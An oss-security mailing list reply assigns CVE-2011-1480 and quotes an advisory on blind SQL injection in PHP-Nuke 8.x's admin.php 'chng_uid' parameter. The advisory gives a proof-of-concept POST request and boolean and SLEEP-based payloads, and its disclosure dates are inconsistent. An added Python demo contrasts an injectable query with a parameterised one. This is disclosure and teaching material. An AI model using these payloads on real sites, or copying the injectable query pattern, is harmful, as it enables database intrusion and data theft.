List: oss-security
Subject: Re: [oss-security] CVE Request: PHP-Nuke 8.x <= "chng_uid" Blind
From: Josh Bressers <bressers () redhat ! com>
Date: 2011-03-30 19:37:02
Message-ID: 1631157357.286087.1301513822965.JavaMail.root () zmail01 ! collab ! prod ! int ! phx2 ! redhat ! com
Please use CVE-2011-1480.
Thanks.
--
JB
----- Original Message -----
> PHP-Nuke 8.x <= Blind SQL Injection Vulnerability
>
>
>
> 1. OVERVIEW
>
> The administration backend of PHP-Nuke 8.x is vulnerable to Blind SQL
> Injection.
>
>
> 2. BACKGROUND
>
> PHP-Nuke is a Web Portal System or content management system. The goal
> of PHP-Nuke is to have an automated web site to distribute news and
> articles with a user system. Each user can submit comments to discuss
> the articles. Main features include: web based admin, surveys, top
> page, access stats page with counter, user customizable box, themes
> manager for registered users, friendly administration GUI with graphic
> topic manager, option to edit or delete stories, option to delete
> comments, moderation system, Referrers page to know who links to us,
> sections manager, customizable HTML blocks, user and authors edit, an
> integrated Banners Ads system, search engine, backend/headlines
> generation (RSS/RDF format), and many, many more friendly functions.
>
>
> 3. VULNERABILITY DESCRIPTION
>
> The "chng_uid" parameter is not properly sanitized upon submission to
> /admin.php, which leads to a Blind SQL Injection vulnerability.
> This allows an attacker to inject or manipulate SQL queries in the
> back-end database, allowing for the manipulation or disclosure of
> arbitrary data.
>
>
> 4. VERSIONS AFFECTED
>
> 8.0 and lower
>
> Tested version: 8.0
> The paid versions, 8.1 and 9.0, of php-Nuke may be vulnerable as well.
>
>
> 5. PROOF-OF-CONCEPT/EXPLOIT
>
> => /admin.php
>
> POST /admin.php HTTP/1.1
> Referer: http://localhost/admin.php?op=mod_users
> Content-Type: application/x-www-form-urlencoded
> Host: localhost
>
> chng_uid=[BLIND_SQL_INJECTION]+&op=modifyUser
>
>
> Tested Payloads:
> ' or 1=1-- [TRUE]
> ' or 1=2-- [FALSE]
> ' or substring(@@version,1,1)=5-- [TRUE if mySQL version is 5.x]
> ' or substring(@@version,1,1)=4-- [FALSE if mySQL version is 5.x]
> ' or SLEEP(15)=0-- [sleep for 15 seconds]
>
> Successful response (True) returns the user update form page.
>
>
> 6. SOLUTION
>
> Lock down access to php-Nuke administration backend.
> No patch is available yet.
> Use of this product is NOT recommended because of the long lack of
> updates and vendor negligence regarding security reports.
>
>
> 7. VENDOR
>
> php-Nuke Developers
> http://phpnuke.org/
>
>
> 8. CREDIT
>
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
>
>
> 9. DISCLOSURE TIME-LINE
>
> 2011-01-01: contacted author through emails
> 2011-01-25: contacted author through web site contact form
> 2010-03-23: no replies from author
> 2010-03-23: vulnerability disclosed
>
>
> 10. REFERENCES
>
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_sql_injection
> About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
> PHP-Nuke 8.0:
> http://phpnuke.org/modules.php?name=Downloads&d_op=getit&lid=658
> CWE-89: http://cwe.mitre.org/data/definitions/89.html
>
>
>
> #yehg [2010-03-23]
>
> keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1, blind, sqlin, sql
> injection
>
> ---------------------------------
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd
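As an added illustration of the behaviour the quoted advisory describes (this is not code from the advisory, from the list reply, or from PHP-Nuke itself): the first lookup below interpolates the chng_uid value into the SQL text, so the advisory's TRUE/FALSE payloads decide whether a row (the "user update form" oracle) comes back, while the bound-parameter version treats the same input as plain data. The table name, the columns, and the use of an in-memory SQLite database in place of PHP-Nuke's MySQL backend are assumptions made for the demonstration.

```python
"""Boolean-blind SQL injection oracle versus a parameterised lookup.

Constructed example: the schema and query shape are assumptions standing in
for the admin.php user-modification lookup, not PHP-Nuke's real code.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a small constructed user table in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT PRIMARY KEY, username TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)", [("2", "alice"), ("3", "bob")]
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, chng_uid: str):
    """Assumed shape of the flaw: chng_uid is pasted into the SQL text.

    A quote in the value terminates the literal, so `' or 1=1--` makes the
    WHERE clause always true and `' or 1=2--` makes it always false.
    """
    sql = f"SELECT username FROM users WHERE user_id='{chng_uid}'"
    return conn.execute(sql).fetchone()


def lookup_safe(conn: sqlite3.Connection, chng_uid: str):
    """Hardened form: the value is bound as a parameter and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE user_id=?"
    return conn.execute(sql, (chng_uid,)).fetchone()


def form_shown(row) -> bool:
    """The advisory's oracle: a TRUE result returns the user update form page,
    which in this model means the lookup produced a row."""
    return row is not None


if __name__ == "__main__":
    db = make_db()
    for payload in ("2", "' or 1=1--", "' or 1=2--"):
        print(
            f"{payload!r:14} unsafe form_shown={form_shown(lookup_unsafe(db, payload))}"
            f"  safe form_shown={form_shown(lookup_safe(db, payload))}"
        )
```

Run stand-alone it prints the oracle outcome for a legitimate id and for the two boolean payloads quoted in the advisory, under both query styles.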